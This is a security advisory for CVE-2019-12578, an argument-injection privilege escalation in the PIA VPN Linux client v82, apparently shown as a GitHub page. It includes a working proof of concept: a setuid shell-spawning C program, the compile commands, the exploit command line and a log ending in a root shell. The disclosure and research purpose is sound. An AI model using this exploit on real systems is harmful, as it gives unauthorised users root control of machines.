Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12578.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
122 lines (83 sloc)
4.17 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA Linux Privilege Escalation: Argument Injection | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12578 | |
| Vendor Advisory: N/A | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | |
| Client v82 for Linux could allow an authenticated, local attacker to run | |
| arbitrary code with elevated privileges. | |
| The PIA Linux binary openvpn_launcher.64 is setuid root. This binary executes | |
| /opt/pia/openvpn-64/openvpn passing the parameters provided from the command | |
| line. Care was taken to programmatically blacklist potentially dangerous openvpn | |
| parameters, however the --route-pre-down parameter is not. This parameter accepts | |
| an arbitrary path to a script/program to be executed when OpenVPN exits. The | |
| --script-security parameter also needs to be passed to allow for this action to | |
| be taken. --script-security is not currently in the blacklist. A local unprivileged | |
| user can pass a malicious script/binary to the --route-pre-down option and will be | |
| executed when openvpn is stopped. | |
| Information on the --route-pre-down parameter from openvpn --help | |
| --route-pre-down cmd : Run command cmd before routes are removed. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F | |
| Base: 7.8 | |
| Temporal: 7.6 | |
| Test Environment | |
| OS: Ubuntu 18.04.1 LTS | |
| Kernel: 4.15.0-43-generic | |
| PIA Version: v82 | |
| Note: macOS appears to follow the same pattern and could be vulnerable to the | |
| same issue but I have not verified it. | |
| Steps to reproduce | |
| All steps are executed as a low privileged user. | |
| Step 1 - Create woot.c to spawn a shell when executed. | |
| #include <stdlib.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| int main(int argvc, char **arv){ | |
| setreuid(0,0); | |
| execl("/bin/sh","/bin/sh",NULL); | |
| } | |
| Step 2 - Compile the malicious binary | |
| gcc -fPIC -o woot -Wall -c woot.c | |
| Step 3 - Execute openvpn_launcher.64 with the --route-pre-down parameter with | |
| the path to the woot program. In 5 seconds a root shell will be spawned. | |
| Note: Using the timeout program is optional. The command can be executed without | |
| this but you will need to enter the control-c sequence to kill the openvpn process. | |
| /usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \ | |
| --route-pre-down $PWD/woot --dev tun0 --script-security 2 | |
| Step 4 - At this point the OpenVPN process will be running. Enter the control-c | |
| if the timeout program was not used. | |
| Example | |
| user1@woot:~$ id | |
| uid=1001(user1) gid=1001(user1) groups=1001(user1) | |
| user1@woot:~$ cat woot.c | |
| #include <stdlib.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| int main(int argvc, char **arv){ | |
| setreuid(0,0); | |
| execl("/bin/sh","/bin/sh",NULL); | |
| } | |
| user1@woot:~$ gcc -Wall -o woot woot.c | |
| user1@woot:~$ /usr/bin/timeout --signal=SIGINT 5s /opt/pia/openvpn_launcher.64 \ | |
| --route-pre-down $PWD/woot --dev tun0 --script-security 2 | |
| Wed Dec 26 16:54:56 2018 disabling NCP mode (--ncp-disable) because not in P2MP client or server mode | |
| Wed Dec 26 16:54:56 2018 OpenVPN 2.4.6 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [MH/PKTINFO] [AEAD] built on Jul 26 2018 | |
| Wed Dec 26 16:54:56 2018 library versions: OpenSSL 1.1.0h 27 Mar 2018, LZO 2.06 | |
| Wed Dec 26 16:54:56 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts | |
| Wed Dec 26 16:54:56 2018 ******* WARNING *******: All encryption and authentication features disabled -- All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION! | |
| Wed Dec 26 16:54:57 2018 TUN/TAP device tun0 opened | |
| Wed Dec 26 16:54:57 2018 Could not determine IPv4/IPv6 protocol. Using AF_INET | |
| Wed Dec 26 16:54:57 2018 UDPv4 link local (bound): [AF_INET][undef]:1194 | |
| Wed Dec 26 16:54:57 2018 UDPv4 link remote: [AF_UNSPEC] | |
| Wed Dec 26 16:55:01 2018 event_wait : Interrupted system call (code=4) | |
| Wed Dec 26 16:55:01 2018 /home/user1/woot tun0 1500 1500 init | |
| # id | |
| uid=0(root) gid=1001(user1) groups=1001(user1) | |
| # | |
| Timeline: | |
| 2018-12-26: Reported to vendor | |
| 2018-12-26: Vendor acknowledged receipt of report | |
| 2019-01-18: Vendor states fix will be available in v83 however this version was never released. | |
| The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | |
| 2019-06-10: Public disclosure |